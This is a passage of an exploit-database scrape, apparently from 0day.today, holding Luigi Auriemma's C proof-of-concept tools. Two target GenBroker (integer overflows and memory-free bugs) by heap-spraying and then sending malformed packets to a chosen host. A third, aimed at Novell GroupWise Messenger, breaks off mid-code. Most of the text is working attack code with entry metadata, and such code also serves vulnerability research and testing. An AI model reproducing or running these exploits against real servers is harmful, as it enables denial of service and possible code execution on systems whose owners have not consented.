#include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 38080\r\n#define BUFFSZ 0x2000 // 0x4000 is the max but 0x2000 seems more compatible\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz);\r\nint putss(u8 *data, u8 *str);\r\nint putmm(u8 *data, u8 *str, int size);\r\nint putcc(u8 *data, int chr, int size);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n type;\r\n u16 port = PORT;\r\n u8 *host,\r\n *buff,\r\n *fill,\r\n *p,\r\n *f;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"GenBroker <= 9.21.201.01 multiple integer overflows \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \" refer to the relative advisories for the available numbers\\n\"\r\n \" and what vulnerabilities they test\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), port);\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n p = buff;\r\n switch(bug) {\r\n case 1: {\r\n type = 0x89a;\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 
0x2000, 16);\r\n p += putxx(p, 0x20000001, 32);\r\n p += putxx(p, 0, 32);\r\n break;\r\n }\r\n case 2: {\r\n type = 0x453;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 16);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 3: {\r\n type = 0x4b0;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 4: {\r\n type = 0x4b2;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 5: {\r\n type = 0x4b5;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 6: {\r\n type = 0x7d0;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 7: {\r\n type = 0xDAE;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 8: {\r\n type = 0xfa4;\r\n p += putxx(p, 0x20000001, 32);\r\n break;\r\n }\r\n case 9: {\r\n type = 0xfa7;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 10: {\r\n type = 0x1bbc;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 11: {\r\n type = 0x1c84;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x10000001, 32);\r\n break;\r\n }\r\n case 12: {\r\n type = 0x26AC;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n default: {\r\n 
printf(\"\\nError: invalid bug number %d\\n\", bug);\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n p += putcc(p, 0x41, BUFFSZ - (p - buff)); // good as string size too\r\n // send_gen automatically adjusts the size to 0x1ff4\r\n\r\n // the following part is not needed so can be removed\r\n printf(\"- heap spray packets: \");\r\n fill = malloc(BUFFSZ);\r\n if(!fill) std_err();\r\n f = fill;\r\n f += putxx(f, 340, 32);\r\n f += putss(f, \"parameter\");\r\n f += putss(f, \"value\");\r\n for(i = 0; i < 340; i++) {\r\n f += putss(f, \"AAAA\");\r\n f += putss(f, \"AAAA\");\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n }\r\n for(i = 0; i < 20; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, 0x4b2, fill, f - fill);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- malformed packets: \");\r\n for(i = 0; i < 10; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, type, buff, p - buff);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz) {\r\n static u8 buff[BUFFSZ];\r\n static int pck = 1;\r\n int t;\r\n u8 *p;\r\n\r\n t = 4 + 4 + 4 + datasz;\r\n if(t > (BUFFSZ - 12)) t = BUFFSZ - 12;\r\n\r\n p = buff;\r\n p += putxx(p, 1, 16);\r\n p += putxx(p, htons(pck++), 16);\r\n p += putxx(p, htonl(1), 32);\r\n p += putxx(p, htonl(t), 32);\r\n\r\n p += putxx(p, 1, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, type, 32);\r\n if(datasz > 0) p 
+= putmm(p, data, datasz);\r\n\r\n if(send(sd, buff, p - buff, 0) < 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str) {\r\n int len;\r\n u8 *p;\r\n\r\n len = 0;\r\n if(str) len = strlen(str);\r\n\r\n p = data;\r\n if(len < 0xff) {\r\n p += putxx(p, len, 8);\r\n } else {\r\n p += putxx(p, 0xff, 8);\r\n p += putxx(p, len, 16);\r\n }\r\n p += putmm(p, str, len);\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *str, int size) {\r\n if(size < 0) size = strlen(str);\r\n memcpy(data, str, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int size) {\r\n memset(data, chr, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = num >> ((bytes - 1 - i) << 3);\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18889"}, {"lastseen": "2018-01-10T19:05:29", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 2, "reporter": "Luigi Auriemma", "published": 
"2012-07-01T00:00:00", "title": "GenBroker <= 9.21.201.01 multiple memory free vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-10T19:05:29", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18890", "href": "https://0day.today/exploit/description/18890", "sourceData": "--------\r\nwinerr.h\r\n--------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign 
requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n 
exit(1);\r\n}\r\n\r\n-----------\r\ngenesis_1.c\r\n-----------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 38080\r\n#define BUFFSZ 0x2000 // 0x4000 is the max but 0x2000 seems more compatible\r\n#define ELEMENTS 0xfff\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz);\r\nint putss(u8 *data, u8 *str);\r\nint putmm(u8 *data, u8 *str, int size);\r\nint putcc(u8 *data, int chr, int size);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n type;\r\n u16 port = PORT;\r\n u8 *host,\r\n *buff,\r\n *fill,\r\n *p,\r\n *f;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"GenBroker <= 9.21.201.01 multiple memory free vulnerabilities \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \" refer to the relative advisory for the available numbers\\n\"\r\n \" and what vulnerabilities they test\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n bug = 
atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), port);\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n p = buff;\r\n switch(bug) {\r\n case 1: {\r\n type = 0x4b0;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32); // elements of the first array (numbers)\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, ELEMENTS, 32); // elements of the second array (strings)\r\n p += putxx(p, ELEMENTS, 32); // elements of the third array (strings\r\n break;\r\n }\r\n case 2: {\r\n type = 0x4b2;\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 3: {\r\n type = 0x4b5;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 4: {\r\n type = 0xDAE;\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 5: {\r\n type = 0x1bbc;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n default: {\r\n printf(\"\\nError: invalid bug number %d\\n\", bug);\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n // for this type of attack the data must be supplied before\r\n // the malformed packet so the following is useless\r\n //p += putcc(p, 0x41, BUFFSZ - (p - buff)); // good as string size too\r\n // send_gen automatically adjusts the size to 0x1ff4\r\n\r\n printf(\"- heap spray packets: \");\r\n fill = malloc(BUFFSZ);\r\n if(!fill) std_err();\r\n f = fill;\r\n f += putxx(f, 340, 32);\r\n f += putss(f, \"parameter\");\r\n f += putss(f, \"value\");\r\n for(i = 0; i < 340; i++) 
{\r\n f += putss(f, \"AAAA\");\r\n f += putss(f, \"AAAA\");\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n }\r\n for(i = 0; i < 20; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, 0x4b2, fill, f - fill);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- malformed packets: \");\r\n for(i = 0; i < 10; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, type, buff, p - buff);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz) {\r\n static u8 buff[BUFFSZ];\r\n static int pck = 1;\r\n int t;\r\n u8 *p;\r\n\r\n t = 4 + 4 + 4 + datasz;\r\n if(t > (BUFFSZ - 12)) t = BUFFSZ - 12;\r\n\r\n p = buff;\r\n p += putxx(p, 1, 16);\r\n p += putxx(p, htons(pck++), 16);\r\n p += putxx(p, htonl(1), 32);\r\n p += putxx(p, htonl(t), 32);\r\n\r\n p += putxx(p, 1, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, type, 32);\r\n if(datasz > 0) p += putmm(p, data, datasz);\r\n\r\n if(send(sd, buff, p - buff, 0) < 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str) {\r\n int len;\r\n u8 *p;\r\n\r\n len = 0;\r\n if(str) len = strlen(str);\r\n\r\n p = data;\r\n if(len < 0xff) {\r\n p += putxx(p, len, 8);\r\n } else {\r\n p += putxx(p, 0xff, 8);\r\n p += putxx(p, len, 16);\r\n }\r\n p += putmm(p, str, len);\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *str, int size) {\r\n if(size < 0) size = 
strlen(str);\r\n memcpy(data, str, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int size) {\r\n memset(data, chr, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = num >> ((bytes - 1 - i) << 3);\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18890"}, {"lastseen": "2018-01-05T01:23:48", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-07-01T00:00:00", "title": "Novell GroupWise Messenger <= 2.1.0 DoS", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-05T01:23:48", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/", "value": 6.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18885", "href": "https://0day.today/exploit/description/18885", "sourceData": "winerr.h\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace 
the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send 
after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\r\n----------\r\n\r\nnmma_x.c\r\n\r\n----------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <stdarg.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 
1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 8300\r\n#define BUFFSZ 8192 // the server doesn't handle more than this\r\n#define MAXSZ 0xff0 // the server doesn't handle more than this\r\n\r\n#define BOFCHR 0x41414141\r\n#define BUG2a 0x00560224\r\n#define BUG2b 0x00560324\r\n\r\n\r\n\r\nint tcp_recv(int sd, u8 *buff, int size);\r\nint recv_gwm(int sd);\r\nint send_gwm(int sd, u8 *cmd, ...);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug;\r\n u16 port = PORT;\r\n u8 tmp[32],\r\n *host;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Vulnerabilities in Novell GroupWise Messenger <= 2.1.0 \" VER \"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \" refer to the relative advisories for the available numbers\\n\"\r\n \" and what vulnerabilities they test\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));\r\n\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n\r\n if(bug == 0) {\r\n // lame DoS only\r\n send_gwm(sd, \"login\",\r\n 
